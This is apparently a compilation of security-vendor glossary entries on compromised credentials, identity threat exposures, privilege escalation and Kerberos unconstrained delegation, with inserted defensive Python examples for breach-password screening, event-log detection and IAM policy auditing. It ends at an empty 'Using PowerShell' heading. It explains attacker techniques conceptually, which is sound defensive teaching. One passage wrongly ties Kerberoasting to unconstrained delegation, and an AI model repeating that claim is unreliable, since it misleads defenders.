Some well-known examples of compromised credentials include: RockYou2024 Breach: This incident involved the leak of a staggering 10 billion credentials, one of the largest password dumps in history. Although the sheer volume is alarming, experts pointed out that much of the data may be of limited immediate use to attackers because it contains outdated or irrelevant entries. The leak is nonetheless a stark reminder of the dangers of password reuse and the need for strong authentication practices, including multi-factor authentication (Daily Security Review). Microsoft Executive Accounts Breach: Early in 2024, a Russia-aligned threat actor breached Microsoft's corporate email accounts, including those of senior leadership and cybersecurity teams. The intrusion started with a password spray against a legacy, non-production test tenant account that lacked multi-factor authentication. The attackers exfiltrated sensitive email communications between Microsoft and various U.S. federal agencies (CRN). Okta Data Breach: In October 2023, Okta, a leading identity services provider, disclosed that a threat actor had accessed its customer support system using stolen credentials. The attack allowed unauthorized access to customer support cases, underlining the risks of compromised credentials even in systems designed to manage and secure user identities. In 2023, DNA testing company 23andMe disclosed that attackers had used credential stuffing against customer accounts protected by reused passwords, and had then scraped data on millions of other users through a relatives-matching feature. In 2020, Nintendo confirmed that roughly 300,000 Nintendo Network ID accounts had been accessed with stolen login credentials, some of which were used to make fraudulent purchases. In early 2023, PayPal notified about 35,000 customers that a credential stuffing campaign in December 2022 had exposed their names, addresses, and other personal data.
Compromised credentials are a serious threat, and protecting accounts requires vigilance about phishing, strong unique passwords, multi-factor authentication, and regular monitoring of accounts for signs of fraud. With care and awareness, the risks can be reduced. The Dangers of Compromised Credentials Compromised credentials pose serious risks to organizations and individuals. Once login credentials have been stolen, attackers can access sensitive data and systems, enabling a range of malicious activity. According to Verizon's 2020 Data Breach Investigations Report, over 80% of hacking-related breaches involved brute force or the use of lost or stolen credentials. The impacts of credential-based attacks include: Data breaches: With access to accounts and systems, including access gained through credential stuffing, attackers can steal confidential data such as customer information, employee records, and intellectual property. Financial loss: Malicious actors may transfer funds, make unauthorized purchases, or commit payment fraud with stolen account access. Reputational harm: Data breaches and account takeovers damage customer trust and brand reputation. Account takeover: Attackers hijack online accounts for spam, fraud, and other malicious activities; compromised social media accounts are commonly abused to spread malware and misinformation. While individuals should use unique, strong passwords and enable multi-factor authentication wherever possible, organizations must also implement strong access policies and security controls. Prompt password resets on suspected compromise, account monitoring, and employee education help reduce the risks. Detecting Compromised Credentials To detect compromised credentials, organizations use User and Entity Behavior Analytics (UEBA) systems, which monitor user activity and behavior to identify anomalies.
UEBA solutions analyze log data from sources such as network devices, operating systems, and applications to build a baseline of normal user activity; deviations from that baseline can indicate compromised credentials or accounts. Security Information and Event Management (SIEM) platforms also help by aggregating and analyzing security logs from systems across the organization. SIEM tools use log correlation and analytics to identify suspicious login attempts, logins from unexpected locations, and privilege escalations that can point to compromised accounts. Continuous monitoring of user accounts and authentication events is crucial for early detection. Adaptive and risk-based authentication add further layers that help identify unauthorized access, and requiring multi-factor authentication, especially for privileged accounts, makes it harder for attackers to exploit compromised passwords. Monitoring for excessive failed logins, brute force patterns, and credential stuffing campaigns also helps detect compromised accounts before they are misused. Preventing Compromised Credential Attacks To prevent compromised credential attacks, organizations should implement stringent security policies and controls. Multi-factor authentication (MFA) adds an extra layer of protection for user accounts, non-human identities, and systems; requiring one-time passwords, security keys, or biometrics in addition to passwords makes accounts harder to compromise. Disallowing previously exposed passwords stops users from choosing passwords already known to attackers: with a blocklist of compromised passwords, organizations can prevent employees from picking passwords that are easily guessed or already leaked. Continuous monitoring for exposed credentials on the dark web and in password-cracking communities enables a swift response.
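The blocklist check described above is normally implemented without ever sending the candidate password, or even its full hash, to the breach corpus. As an added example (not part of the original entry), the Python below follows the k-anonymity range model used by Have I Been Pwned's Pwned Passwords service: the client hashes locally, sends only the first five hex characters of the SHA-1, and compares the returned suffixes itself. The corpus here is constructed inline from a handful of plaintexts with made-up counts so the example runs offline; a deployment would query the real range endpoint with the same prefix. The minimum length and the "must not contain the user name" rule are local policy choices, not taken from the page.

```python
"""Screen candidate passwords against breach data with a k-anonymity range
lookup. The corpus below is constructed for this example; a deployment would
call a real range endpoint with the same 5-character prefix."""
import hashlib
from collections import defaultdict


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


class ConstructedBreachCorpus:
    """Stand-in for a breached-password range service.

    Built from (plaintext, times_seen) pairs purely so the example is
    self-consistent; a real corpus stores only hashes. `queries` records what
    the server learns: 5-hex-character prefixes, never a full hash.
    """

    def __init__(self, leaked):
        self._ranges = defaultdict(dict)
        for pw, count in leaked:
            digest = sha1_hex(pw)
            self._ranges[digest[:5]][digest[5:]] = count
        self.queries = []

    def range_for(self, prefix: str) -> str:
        """Return 'SUFFIX:COUNT' lines for one prefix, the range-endpoint shape."""
        if len(prefix) != 5:
            raise ValueError("prefix must be 5 hex characters")
        self.queries.append(prefix)
        return "\n".join(f"{s}:{c}" for s, c in sorted(self._ranges.get(prefix, {}).items()))


def breach_count(password: str, range_lookup) -> int:
    """Client side of the k-anonymity check: hash locally, send only the prefix,
    compare the remaining 35 characters against the returned suffixes."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    for line in range_lookup(prefix).splitlines():
        found_suffix, _, count = line.partition(":")
        if found_suffix == suffix:
            return int(count)
    return 0


def evaluate_password(password: str, username: str, range_lookup, min_len=12):
    """Return the list of policy violations; an empty list means acceptable.

    Breach screening and a length minimum follow NIST SP 800-63B; the exact
    minimum and the user-name rule are local policy choices (assumptions here).
    """
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if username and username.lower() in password.lower():
        problems.append("contains the user name")
    seen = breach_count(password, range_lookup)
    if seen:
        problems.append(f"seen {seen} times in breach data")
    return problems


# Constructed leak list: plaintexts and made-up occurrence counts.
LEAKED = [("password", 9_000_000), ("Summer2024!", 1200), ("letmein", 400_000)]
CORPUS = ConstructedBreachCorpus(LEAKED)

if __name__ == "__main__":
    for pw, user in [("Summer2024!", "alice"), ("alice-rides-bicycles-2024", "alice"),
                     ("correct horse battery staple", "bob")]:
        print(pw, "->", evaluate_password(pw, user, CORPUS.range_for) or "ok")
    print("server saw only prefixes:", CORPUS.queries)
```

`evaluate_password` reports every violation at once rather than stopping at the first, so a user is not sent round the loop several times; `CORPUS.queries` shows that the only thing the corpus ever learned is a five-character prefix, which is what makes the check safe to run against a third-party service.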
Monitoring password dumps and breach data lets security teams identify compromised accounts, force password resets, and enable MFA. Regular phishing simulations and security awareness training help employees recognize and avoid phishing emails and malicious websites built to steal login credentials. Explaining the risks of oversharing on social media and reusing passwords across accounts builds good security habits and a culture of vigilance. CAPTCHAs, automated tests that humans can pass but scripts generally cannot, add friction to login and account-access flows. They slow down bots replaying stolen credential sets from data breaches, but they are a rate-limiting measure rather than an authentication factor and should not be relied on alone. Enacting and enforcing strong password policies, with long passwords screened against breach data and changed promptly on any sign of compromise, makes compromised credentials harder to obtain and to use. Mitigation Strategies for Compromised Credentials Once compromised credentials have been identified, several mitigation strategies reduce the risk. Password Reset The most direct way to mitigate compromised credentials is to reset the affected passwords immediately, and to revoke active sessions and tokens at the same time, since a password change alone does not end a session the attacker already holds. Enable Multi-Factor Authentication Enabling MFA adds an extra layer of protection. MFA requires not only a password but another method of authentication, such as a code on the user's mobile device. Even if an attacker obtains a user's password, they would also need to pass that second factor to log in. Monitor Accounts for Suspicious Activity Closely monitoring compromised accounts for signs of suspicious logins or activity helps detect unauthorized access.
Security teams should check account login times, locations, and IP addresses for anomalies that could indicate an attacker is using stolen credentials to access the account. Detecting unauthorized access quickly can help limit the damage from compromised credentials.

### Provide Additional Training

Compromised credentials are often the result of weak or reused passwords, phishing, or other social engineering attacks. Providing regular security awareness and education training helps educate users on password best practices, phishing identification, and other topics that reduce the risk of compromise. Additional training and simulated phishing campaigns have been shown to significantly improve security posture over time.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-threat-exposure/

Security weaknesses—such as misconfigurations, outdated identity systems, or exploitable built-in features—that expose organizations to identity-based threats like credential theft, privilege escalation, or lateral movement.

Identity Threat Exposures (ITEs) are security weaknesses that expose an environment to identity threats: credential theft, privilege escalation, or lateral movement. An ITE can result from a misconfiguration, legacy identity infrastructure, or even built-in features. Attackers use these ITEs as co-conspirators to perform credential theft, privilege escalation and lateral movement. What's more, due to the common practice of syncing AD user accounts to the cloud IdP, this underground exposure can also provide attackers with direct access to your SaaS environment.

## Why are Identity Threat Exposures dangerous?

The vast majority of organizations today employ a hybrid identity infrastructure, with Active Directory (AD) for on-prem resources and a cloud IdP for SaaS. The common practice is for AD to sync users' password hashes to the cloud IdP, so users can access SaaS apps with the same credentials as on-prem resources.
This significantly increases the SaaS environment's potential attack surface, as any attack that results in the adversary gaining cleartext passwords paves the way to cloud assets. ITEs that expose weakly encrypted password hashes (NTLM, NTLMv1, admins with SPN) or enable attackers to reset user passwords (shadow admins) are already extensively exploited by adversaries.

## What Identity Threat Exposure types are there?

We classify ITEs into four groups, based on the malicious actions they enable attackers to achieve:

- Password Exposers: ITEs that allow adversaries to access a user account's cleartext password.
- Privilege Escalators: ITEs that enable adversaries to escalate any access privileges they already possess.
- Lateral Movers: ITEs that enable adversaries to use compromised accounts to perform undetected lateral movement.
- Protection Dodgers: ITEs that make security controls less effective at monitoring and protecting user accounts.

## Examples of Identity Threat Exposures

| Category | Related MITRE ATT&CK | Examples |
| --- | --- | --- |
| Password Exposers | Credential access | NTLM authentication, NTLMv1 authentication, Admins with SPN |
| Privilege Escalators | Privilege escalation | Shadow admins, Unconstrained delegation |
| Lateral Movers | Lateral movement | Service accounts, Prolific users |
| Protection Dodgers | There isn't an exact MITRE ATT&CK technique that maps to this category. It allows attackers to go undetected for long periods of time. | New user accounts, Shared accounts, Stale users |

## How to protect against Identity Threat Exposures?

- Know where you're exposed: Make sure you have visibility into all the different types of ITEs in your environment. If you're syncing AD users to your cloud IdP, ensure it follows Microsoft's best practices and does not create a mass of idle users.
- Eliminate risk where you can.
- Contain and monitor existing risks: For ITEs that cannot be eliminated, such as service accounts or the use of NTLM, ensure the SecOps team has a process in place to monitor these accounts closely for any sign of compromise.
- Take preventative measures: Apply identity segmentation rules or MFA policies to prevent user accounts from falling victim to the ITEs listed above where possible. Implement access policies on your service accounts that block them from accessing any destination beyond their pre-designated resources.
- Connect the identity and security teams: Responsibility for identity protection is distributed between the identity and security teams. The security team's knowledge enables it to prioritize which ITEs to resolve, while the identity team can put the fixes into effect, creating an integrated identity security posture.

---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/privilege-escalation/

A type of attack in which an adversary acquires higher access controls—either by exploiting bugs or misconfigurations—to perform unauthorized operations.

Privilege escalation is a term used in cybersecurity that describes an attacker's actions to gain unauthorized access to resources or perform unauthorized actions within a computer system or network. This type of attack can occur in any organization's environment, from individual machines to large-scale network infrastructures.

There are two primary types of privilege escalation:

- Vertical Privilege Escalation: Also known as "privilege elevation," this occurs when an attacker gains higher privileges, typically administrative or root access. This allows the attacker to perform virtually any operation on the system, such as accessing confidential data, modifying system configurations, or deploying malicious software.
- Horizontal Privilege Escalation: In this scenario, an attacker expands their access across a network by assuming the identity of other users with similar privilege levels. Although not elevating their privilege vertically, the attacker gains unauthorized access to additional resources, which can be exploited for information theft or further attacks within the network.

## Common Scenarios of Privilege Escalation

- Exploiting Software Vulnerabilities: Attackers often exploit flaws in software or operating systems that allow them to elevate their privileges. These vulnerabilities can stem from inadequate testing, legacy code, or unpatched systems.
- Configuration Errors: Misconfigured systems and services with overly permissive rights can inadvertently grant low-privileged users access to sensitive functions or data.
- Shadow Admins: Shadow admins are user accounts that have been inadvertently assigned full or partial admin privileges, or configuration/reset privileges over admin accounts. Compromising a shadow admin enables an attacker to control an account that has high access and configuration privileges, paving the way to further access and compromise of additional resources.
- Unconstrained Delegation: The insecure legacy version of Kerberos delegation. It allows a compromised account to access all the same resources as the delegating account. This capability is mostly required for machine accounts that access other machines on behalf of a user; for example, when an app server accesses a database to fetch data for an app user. When an admin account logs in to a machine that has unconstrained delegation, its TGT remains stored in the machine's memory. This allows an attacker who controls that machine to establish a new session with the privileges of the admin account's TGT.
- Social Engineering and Phishing Attacks: By deceiving legitimate users or administrators into executing malicious actions, attackers can gain elevated privileges.
- Use of Stolen Credentials: Attackers may use various methods to steal credentials, such as keylogging or exploiting a data breach. These credentials are then used to access systems as a legitimate user, bypassing security measures.
- Lateral Movement: Privilege escalation often precedes lateral movement in an attack chain. Initially, attackers may gain access to a network with limited privileges. Through privilege escalation, they acquire the higher-level permissions necessary to access more secure areas of the network or execute specific tasks, such as installing malware or extracting sensitive data.

## Detecting Privilege Escalation Attempts

Privilege escalation detection is a critical component of a comprehensive cybersecurity defense strategy. By identifying these attempts early, IT and security professionals can mitigate potential damage and stop attackers' efforts to gain unauthorized access. This section outlines key indicators of compromise (IoCs) and the tools and techniques used for effective detection.

### Indicators of Compromise (IoCs)

- Unusual Account Activity: This includes repeated login failures, use of privileged commands by non-administrative users, or sudden changes in user permissions. Such activities may indicate an attacker's attempt to gain or exploit elevated privileges.
- Unexpected System Changes: Modifications to system files, installation of new software, or alterations to system configuration settings without prior approval or notification can signal an ongoing privilege escalation attack.
- Anomalies in Network Traffic: Unusual outbound traffic patterns, especially to known malicious IP addresses or domains, might suggest that an attacker is exfiltrating data after gaining elevated access.
- Security Log Tampering: Attackers often try to cover their tracks by deleting or altering security logs. Unexplained gaps in log files or inconsistencies in log entries can be a telltale sign of manipulation to hide unauthorized actions.
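The indicators above (repeated failures, privileges granted to non-admin accounts, permission changes, log tampering) can be expressed as concrete rules over Windows Security log events. The following is an added example, not from the page or from Silverfort: the event records, account names, admin allowlist and failure threshold are constructed for the demo, while the event IDs (4625, 4672, 4728, 4732, 1102) are the standard Windows Security event IDs for those activities.

```python
"""Rule-based detection of privilege-escalation indicators in Windows Security events.

Added example, not Silverfort's code. The events below are constructed to carry
the fields a SIEM would extract; the event IDs are the standard Windows Security
log IDs. The admin allowlist and the failure threshold are assumptions.
"""
from collections import Counter

# Standard Windows Security event IDs used by the rules.
LOGON_FAILURE = 4625
SPECIAL_PRIVILEGES_ASSIGNED = 4672     # admin-equivalent privileges granted to a new logon
MEMBER_ADDED_GLOBAL_GROUP = 4728       # member added to a security-enabled global group
MEMBER_ADDED_LOCAL_GROUP = 4732        # member added to a security-enabled local group
AUDIT_LOG_CLEARED = 1102

# Assumed baseline for the demo.
KNOWN_ADMINS = {"CORP\\jdoe-admin", "CORP\\svc-backup"}
SENSITIVE_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
FAILURE_THRESHOLD = 5

# Constructed sample events (demo data, not from a real system); `record` mimics EventRecordID.
EVENTS = [
    {"record": 1001, "id": 4625, "account": "CORP\\alice", "source": "10.0.0.7"},
    {"record": 1002, "id": 4625, "account": "CORP\\alice", "source": "10.0.0.7"},
    {"record": 1003, "id": 4625, "account": "CORP\\alice", "source": "10.0.0.7"},
    {"record": 1004, "id": 4625, "account": "CORP\\alice", "source": "10.0.0.7"},
    {"record": 1005, "id": 4625, "account": "CORP\\alice", "source": "10.0.0.7"},
    {"record": 1006, "id": 4624, "account": "CORP\\alice", "source": "10.0.0.7"},
    {"record": 1007, "id": 4672, "account": "CORP\\alice"},
    {"record": 1008, "id": 4728, "actor": "CORP\\alice", "member": "CORP\\alice", "group": "Domain Admins"},
    {"record": 1009, "id": 4672, "account": "CORP\\jdoe-admin"},
    {"record": 1010, "id": 1102, "account": "CORP\\alice"},
    {"record": 1050, "id": 4624, "account": "CORP\\bob", "source": "10.0.0.9"},
]


def detect(events):
    """Return (rule, detail) findings, in the order the triggering events occur."""
    findings = []
    failures = Counter()
    prev_record = None
    for e in events:
        eid = e["id"]
        if eid == LOGON_FAILURE:
            failures[e["account"]] += 1
            if failures[e["account"]] == FAILURE_THRESHOLD:      # fire once per account
                findings.append(("repeated-logon-failures", e["account"]))
        elif eid == SPECIAL_PRIVILEGES_ASSIGNED and e["account"] not in KNOWN_ADMINS:
            findings.append(("unexpected-privileged-logon", e["account"]))
        elif eid in (MEMBER_ADDED_GLOBAL_GROUP, MEMBER_ADDED_LOCAL_GROUP) and e["group"] in SENSITIVE_GROUPS:
            findings.append(("sensitive-group-change", f"{e['member']} -> {e['group']} by {e['actor']}"))
        elif eid == AUDIT_LOG_CLEARED:
            findings.append(("audit-log-cleared", e["account"]))
        # Record IDs within one channel are sequential; a jump in a contiguous export means
        # entries are missing (deleted, or filtered upstream, which the analyst must rule out).
        if prev_record is not None and e["record"] != prev_record + 1:
            findings.append(("record-gap", f"{prev_record} -> {e['record']}"))
        prev_record = e["record"]
    return findings


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule:30s} {detail}")
```

In the constructed sequence, a non-admin account accumulates failures, then receives admin-equivalent privileges, adds itself to Domain Admins, and clears the audit log; each step trips a separate rule, and the jump in record numbers after the clear is the "unexplained gap" the last IoC describes.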
## Mitigation Strategies and Best Practices

A combination of preventive measures, robust security policies, and a culture of cybersecurity awareness within the organization is required to effectively mitigate the risk of privilege escalation. Below are key strategies and best practices designed to minimize exposure to privilege escalation attacks and bolster security posture.

### Preventive Measures

- Regular Software Updates and Patch Management: One of the simplest yet most effective defenses against privilege escalation is keeping all systems and software up to date. Regularly applying patches closes vulnerabilities that attackers could exploit to gain elevated privileges.
- Principle of Least Privilege (PoLP): Enforce the principle of least privilege by ensuring that users have only the access rights necessary for their roles. Regular reviews and audits of user privileges help prevent the accumulation of unnecessary access rights that could be exploited.
- Strong Authentication and Access Control Measures: Implement multi-factor authentication (MFA) and robust access policies to secure user accounts against unauthorized access attempts. For sensitive systems and high-privilege accounts, consider using advanced authentication methods, such as biometrics or hardware tokens.
- Segregation of Duties (SoD): Divide critical tasks and permissions among multiple users or departments to reduce the risk of a single point of compromise. This approach limits the potential damage an attacker can inflict if they manage to escalate privileges within one segment of the organization.

### Response Strategies

- Identity Threat Detection and Response (ITDR): Detects threats related to identity compromise and abuse in real time. By analyzing access patterns and behaviors, ITDR solutions can identify suspicious activities that may indicate a privilege escalation attempt and respond accordingly.
- Incident Response Planning: Develop and regularly update a comprehensive incident response plan that includes specific procedures for handling privilege escalation incidents. This plan should outline roles, responsibilities, communication protocols, and steps for containment, eradication, and recovery.
- Proactive Monitoring and Alerting: Use SIEM, EDR, identity security and UEBA solutions to continuously monitor for signs of privilege escalation. Configure alerts for anomalous activities indicative of an escalation attempt, enabling rapid response before attackers can cause significant damage.
- Forensic Analysis and Remediation: Following a privilege escalation incident, conduct a thorough forensic analysis to understand the attack vectors, exploited vulnerabilities, and the scope of the breach. Use this information to strengthen security measures and prevent future occurrences.

### Best Practices for a Secure Environment

- Security Awareness Training: Regularly train all employees on cybersecurity best practices, the dangers of social engineering, and the importance of maintaining operational security. Educated users are less likely to fall victim to attacks that could lead to privilege escalation.
- Secure Configuration and Hardening: Apply secure configuration guidelines and hardening standards to all systems and applications. Remove unnecessary services, close unused ports, and enforce security settings to reduce the attack surface.
- Vulnerability Scanning and Penetration Testing: Periodically perform vulnerability assessments and penetration tests to identify and remediate security weaknesses. These exercises can uncover potential privilege escalation pathways before they are exploited by attackers.

By implementing these mitigation strategies and adhering to cybersecurity best practices, organizations can significantly reduce the risk of privilege escalation attacks.
Defending against such threats requires both technical solutions and a proactive security culture that places vigilance, education, and continuous improvement at the forefront.

## Privilege Escalation in Cloud Environments

With the shift towards cloud computing, preventing privilege escalation has become more complex and challenging. Because of the inherent scalability, flexibility, and shared responsibility models of cloud environments, security must be approached differently. This section highlights the distinctive challenges of cloud-based infrastructure and offers best practices for securing cloud environments against privilege escalation threats.

### Unique Challenges in Cloud Environments

- Complex Identity and Access Management (IAM) Configurations: Cloud platforms offer granular IAM capabilities which, if misconfigured, can inadvertently grant excessive permissions, creating privilege escalation opportunities.
- Shared Responsibility Model: The division of security responsibilities between the cloud service provider (CSP) and the customer can lead to gaps in coverage, especially if there is ambiguity about who is responsible for securing IAM configurations.
- API Security: Cloud services are often accessed and managed through APIs which, if not secured properly, can become vectors for privilege escalation attacks.
- Ephemeral Resources and Dynamic Access: The dynamic nature of cloud environments, with resources being spun up and down, requires adaptive and continuously updated access controls to prevent excessive permissions.

### Best Practices for Securing Cloud Environments

- Implement Least Privilege Access for Cloud Resources: As with on-premises practices, ensure that cloud IAM policies strictly adhere to the principle of least privilege. Regularly audit IAM policies and roles to eliminate unnecessary permissions that could be exploited.
- Utilize Cloud-native IAM Tools: Leverage tools provided by CSPs, such as AWS IAM Access Analyzer or Azure AD Privileged Identity Management, to analyze permissions and detect potential privilege escalation paths.
- Secure Management Interfaces and APIs: Enforce MFA and strong authentication methods for accessing cloud management interfaces and APIs. Apply network restrictions, such as IP whitelisting, to limit access to these critical endpoints.
- Automate Detection and Remediation: Use cloud security posture management (CSPM) tools to automate the detection of misconfigurations and IAM anomalies. Implement automated remediation workflows to quickly address identified issues.
- Educate and Train Cloud Teams: Ensure that teams working with cloud environments are knowledgeable about cloud security best practices and the specific security features of your CSP. Regular training can help prevent accidental misconfigurations that lead to privilege escalation.
- Continuous Monitoring and Logging: Enable and monitor cloud service logs to detect unusual access patterns or changes to IAM configurations. Use cloud-native or third-party SIEM solutions to aggregate and analyze log data for signs of potential privilege escalation.
- Adopt a DevSecOps Approach: Integrate security into the CI/CD pipeline so that IAM policies and cloud configurations are evaluated as part of the development and deployment process. This proactive approach helps catch and remediate security issues before they reach production.

Securing cloud environments against privilege escalation requires a proactive, layered approach that combines technical controls, continuous monitoring, and a strong security culture. By addressing the unique challenges of cloud IAM and leveraging cloud-native security tools, organizations can enhance their defense against privilege escalation attacks in the cloud.
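The least-privilege audit and the automated misconfiguration detection recommended above come down to rules evaluated against policy documents. The following is an added example, not Silverfort's code and not any CSP's tool, showing what such rules look like against AWS-style IAM policy JSON: it flags wildcard actions, `NotAction`/`NotResource` grants, service-wide wildcards and `iam:PassRole` allowed on any role without a condition. The policy documents, the role names and the account id (the AWS documentation example value 123456789012) are constructed for the demo.

```python
"""Audit AWS-style IAM policy documents for permissions that are broader than least privilege.

Added example, not Silverfort's code and not a CSP tool. The policies, the
account id and the role names are constructed for the demo; the checks are the
kind a CSPM rule applies: wildcard actions, NotAction/NotResource grants, and
iam:PassRole without a resource scope or a Condition.
"""
import fnmatch
import json


def _as_list(value):
    """IAM allows scalars or lists in Action/Resource/Statement; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _grants(patterns, action):
    """True if any action pattern (case-insensitive, '*' wildcards) covers `action`."""
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def audit_policy(policy) -> list:
    """Return (statement_index, finding) pairs for every over-broad Allow statement."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        any_resource = "*" in resources
        has_condition = bool(stmt.get("Condition"))

        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append((i, "NotAction/NotResource grants everything not listed"))
        if "*" in actions:
            findings.append((i, "all actions" + (" on all resources" if any_resource else "")))
        for pattern in actions:
            _service, _sep, verb = pattern.partition(":")
            if verb == "*":                       # e.g. "ec2:*", "iam:*"
                findings.append((i, f"service-wide wildcard {pattern}"))
        if _grants(actions, "iam:PassRole") and any_resource and not has_condition:
            findings.append((i, "iam:PassRole on any role without a Condition"))
    return findings


# Constructed policies (demo data). 123456789012 is the AWS documentation example account id.
ADMIN_POLICY = {"Version": "2012-10-17",
                "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}
PASSROLE_POLICY = {"Version": "2012-10-17",
                   "Statement": [{"Effect": "Allow",
                                  "Action": ["iam:PassRole", "lambda:CreateFunction"],
                                  "Resource": "*"}]}
# The corrected form: PassRole limited to one role and to one passing service.
SCOPED_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject"], "Resource": "arn:aws:s3:::app-logs/*"},
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::123456789012:role/lambda-exec",
     "Condition": {"StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}}}]})


if __name__ == "__main__":
    for label, doc in [("admin", ADMIN_POLICY), ("passrole", PASSROLE_POLICY), ("scoped", SCOPED_POLICY)]:
        print(label, audit_policy(doc) or "clean")
```

The same three documents show the fix as well as the finding: the scoped policy grants the identical `iam:PassRole` capability but ties it to one role ARN and one service, which is the form least privilege calls for.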
---

- Published: 2024-05-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/unconstrained-delegation/

A Kerberos delegation type that allows a service to act on behalf of a user to any other service, posing significant security risks if misused.

Unconstrained Delegation is a feature within Active Directory environments that allows designated services to act on behalf of users, requesting access to other network resources without requiring additional authentication. This delegation model grants specified services broad authority, making them trusted to impersonate any user to any service. Unconstrained delegation is the insecure legacy version of Kerberos delegation, which was later followed by constrained delegation and eventually resource-based constrained delegation. This capability is intended to streamline service interactions, particularly in complex, multi-tiered network architectures where services must communicate across boundaries securely and efficiently.

## How Unconstrained Delegation Works

At its core, Unconstrained Delegation operates by leveraging Kerberos tickets. When a user authenticates to a service enabled for Unconstrained Delegation, the Key Distribution Center (KDC) issues a Ticket-Granting Ticket (TGT) along with the usual service ticket. This TGT, which effectively proves the user's identity, can then be presented by the service to the KDC to request tickets to other services on behalf of the user. This process allows for seamless access across services without repeated user authentication prompts.

However, Unconstrained Delegation contrasts sharply with its more restrictive counterpart, Constrained Delegation. While Unconstrained Delegation places no limitations on the services to which the delegated service can request access on behalf of the user, Constrained Delegation tightly controls this by specifying exactly which services are accessible.
This distinction is crucial for security planning, as the broader permissions associated with Unconstrained Delegation pose a greater risk if misconfigured or exploited by malicious actors.

The use of Unconstrained Delegation is typically reserved for scenarios where services require extensive cross-domain interactions that cannot be efficiently managed through Constrained Delegation. Examples include highly integrated application environments and situations where services need to perform wide-ranging actions across various network segments on behalf of users. Despite its utility, the security implications of granting such wide-reaching delegation rights necessitate careful consideration and management to prevent abuse.

## The Risks Associated with Unconstrained Delegation

The utility of Unconstrained Delegation, particularly in complex IT environments, is undeniable. However, its broad permissions model introduces substantial security risks, making it a target for exploitation in cyber attacks. The primary concern with Unconstrained Delegation revolves around its potential misuse for lateral movement and privilege escalation within a network.

One of the most significant risks is that if an attacker compromises a service account enabled for Unconstrained Delegation, they gain the ability to request access tokens for any other service on behalf of any user. This capability can be used to access sensitive information or to take unauthorized actions across the network, effectively turning a single compromised account into a gateway for widespread network penetration. This is especially concerning in environments where service accounts with Unconstrained Delegation privileges have not been properly secured or monitored.

The exploitation of Unconstrained Delegation can also facilitate the execution of sophisticated cyber attacks, including Kerberoasting. Kerberoasting takes advantage of the Kerberos protocol's use of weak encryption for certain aspects of ticket exchange.
Attackers can request service tickets on behalf of any user for services enabled for Unconstrained Delegation, then attempt to crack the tickets offline to discover service account passwords. This attack vector underscores the importance of strong, complex passwords for service accounts and highlights the risks associated with Unconstrained Delegation.

The inherent complexity and administrative overhead associated with managing Unconstrained Delegation settings introduce another layer of risk. Misconfigurations can result in unauthorized access to services, and IT environments are dynamic, so what is secure today may not be secure tomorrow. To mitigate these risks, continuous vigilance, regular audits, and a thorough understanding of delegation settings are essential.

There have been a number of real-world incidents that illustrate the dangers of improperly managed Unconstrained Delegation. Attackers have taken advantage of this weakness to move laterally within networks, escalate their privileges, and cause significant damage to an organization's IT infrastructure. These incidents serve as powerful reminders of the potential consequences of overlooking the security implications of Unconstrained Delegation.

## Best Practices for Secure Delegation

Securing Unconstrained Delegation necessitates a proactive, multi-layered approach, focused on minimizing its inherent risks while leveraging its functionality. Achieving a balance between operational requirements and robust security measures requires the adoption of best practices. Here are strategic practices to enhance the security of Unconstrained Delegation:

### 1. Employ Constrained Delegation Wherever Possible

Transitioning to Constrained Delegation provides a tighter security model by explicitly limiting the services to which a delegated account can present delegated credentials.
This limitation significantly reduces the risk of unauthorized access through delegation, making it a preferred alternative to Unconstrained Delegation whenever feasible.

### 2. Regular Audits and Monitoring

Continuous monitoring and periodic audits of delegation settings are crucial. Organizations should implement solutions that provide visibility into how delegated permissions are being used and by whom. Regular reviews help identify misconfigurations or unnecessary delegation permissions that could expose the network to risks.

### 3. Apply the Principle of Least Privilege

Minimize the number of accounts with Unconstrained Delegation permissions and ensure that these accounts possess only the privileges necessary for their intended functions. This practice limits the potential damage an attacker can inflict if they compromise a delegated account.

### 4. Use Strong Authentication Mechanisms

Enhancing the authentication requirements for accounts with delegation permissions adds an additional layer of security. Implementing Multi-Factor Authentication (MFA) and strong password policies for these accounts can help protect against credential theft and misuse.

### 5. Segmentation of Network Resources

Network segmentation can limit the scope of lateral movement in case of an account compromise. By dividing the network into segments with controlled access, organizations can reduce the reach of accounts with Unconstrained Delegation and contain potential breaches more effectively.

### 6. Implementing Advanced Security Solutions

Utilizing advanced security solutions that can detect and respond to anomalous activities associated with Unconstrained Delegation can significantly enhance protection. Solutions that offer Identity Threat Detection and Response (ITDR) capabilities can identify suspicious patterns of behavior related to delegation, such as abnormal access requests, and provide real-time mitigation.

### 7. Education and Awareness

It is essential that IT and security teams are aware of the risks associated with Unconstrained Delegation and understand best practices for its secure use. Scheduling regular training sessions maintains a high level of attention and ensures that security considerations are incorporated into the management of delegation settings.

Incorporating these best practices into security strategies can help organizations mitigate the risks associated with Unconstrained Delegation, ensuring that the convenience and functionality it offers do not compromise network security.

## Finding Where Unconstrained Delegation Has Been Enabled

Finding where Unconstrained Delegation has been enabled in your Active Directory (AD) environment is crucial for understanding potential security risks and ensuring your network's integrity. Here's a systematic approach to identify these configurations:

### Using PowerShell

